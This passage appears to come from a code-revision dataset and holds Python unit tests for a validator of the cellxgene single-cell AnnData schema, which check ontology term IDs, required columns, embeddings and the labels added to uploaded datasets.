Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. 
This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-3": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n columns = ['assay_ontology_term_id',\n 'development_stage_ontology_term_id',\n 'disease_ontology_term_id', 'ethnicity_ontology_term_id',\n 'is_primary_data', 'sex_ontology_term_id',\n 'tissue_ontology_term_id']\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n self.validator.adata.uns.pop('batch_condition')\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe 'obs' is missing column '{column}'.\"])\n <mask token>\n <mask token>\n\n def test_assay_ontology_term_id(self):\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'CL:000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0\n ] = 'EFO:0010183 sci-plex'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n <mask token>\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. 
When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n\n def test_disease_ontology_term_id(self):\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n self.validator.adata.obs['disease_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['disease_ontology_term_id'][0\n ] = 'PATO:0001894'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n <mask token>\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n\n def test_tissue_ontology_term_id_base(self):\n \"\"\"\n tissue_ontology_term_id categorical with str categories. 
This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n <mask token>\n\n def test_tissue_ontology_term_id_organoid(self):\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 (ORGANOID)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. 
Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = 
Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. 
Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. 
This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. 
Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. 
This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-4": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n columns = ['assay_ontology_term_id',\n 'development_stage_ontology_term_id',\n 'disease_ontology_term_id', 'ethnicity_ontology_term_id',\n 'is_primary_data', 'sex_ontology_term_id',\n 'tissue_ontology_term_id']\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n self.validator.adata.uns.pop('batch_condition')\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe 'obs' is missing column '{column}'.\"])\n\n def test_column_presence_organism(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n\n A separate check is need for organism_ontology_term_id because removing from anndata results in multiple\n errors given that other columns depend on its presence\n \"\"\"\n self.validator.adata.obs.drop('organism_ontology_term_id', axis=1,\n inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Dataframe 'obs' is missing column 'organism_ontology_term_id'.\"\n ,\n \"ERROR: Checking values with dependencies failed for adata.obs['ethnicity_ontology_term_id'], this is likely due to missing dependent column in adata.obs.\"\n ,\n \"ERROR: Checking values with dependencies failed for adata.obs['development_stage_ontology_term_id'], this is likely due to missing dependent column in adata.obs.\"\n ])\n\n def test_obsolete_term_id(self):\n \"\"\"\n Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310\n for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by\n EFO:0009899 for 10x 3' v2.\n\n https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0009310'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 